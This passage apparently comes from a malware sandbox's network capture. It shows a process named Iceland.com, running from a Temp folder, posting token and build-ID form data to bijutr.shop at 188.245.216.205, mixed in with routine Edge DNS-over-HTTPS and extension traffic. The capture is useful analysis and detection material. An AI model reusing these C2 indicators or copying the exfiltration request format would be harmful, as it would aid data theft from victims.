2024-12-27 06:10:10 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49848	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:11 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8Y5XTR16XLN7YMY58GD2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:11 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 59 35 58 54 52 31 36 58 4c 4e 37 59 4d 59 35 38 47 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 38 59 35 58 54 52 31 36 58 4c 4e 37 59 4d 59 35 38 47 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 38 59 35 58 54 52 31 36 58 4c 4e 37 59 4d 59 35 38 47 44 32 0d 0a 43 6f 6e 74 Data Ascii: ------8Y5XTR16XLN7YMY58GD2Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------8Y5XTR16XLN7YMY58GD2Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------8Y5XTR16XLN7YMY58GD2Cont
2024-12-27 06:10:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49944	172.64.41.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:39 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:39 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 27 Dec 2024 06:10:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f872618adfbde99-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49941	172.64.41.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:39 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:39 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 27 Dec 2024 06:10:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f8726191ecac40e-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fc 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomPC)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49949	162.159.61.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:39 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:39 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 27 Dec 2024 06:10:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f8726192eb0420d-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)#)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49952	172.64.41.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 27 Dec 2024 06:10:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f872619fddd80e0-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e2 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49951	162.159.61.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:40 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 27 Dec 2024 06:10:40 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f87261a2e7f4232-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:40 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49953	172.64.41.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:40 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:40 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49956	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:40 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----S2VKXL68GLN7QQIMO8YM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 3165 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:40 UTC	3165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 53 32 56 4b 58 4c 36 38 47 4c 4e 37 51 51 49 4d 4f 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 4b 58 4c 36 38 47 4c 4e 37 51 51 49 4d 4f 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 4b 58 4c 36 38 47 4c 4e 37 51 51 49 4d 4f 38 59 4d 0d 0a 43 6f 6e 74 Data Ascii: ------S2VKXL68GLN7QQIMO8YMContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------S2VKXL68GLN7QQIMO8YMContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------S2VKXL68GLN7QQIMO8YMCont
2024-12-27 06:10:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49943	142.250.181.65	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:40 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 06:10:41 UTC	563	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 154477 X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Thu, 26 Dec 2024 15:58:14 GMT Expires: Fri, 26 Dec 2025 15:58:14 GMT Cache-Control: public, max-age=31536000 Age: 51147 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-27 06:10:41 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 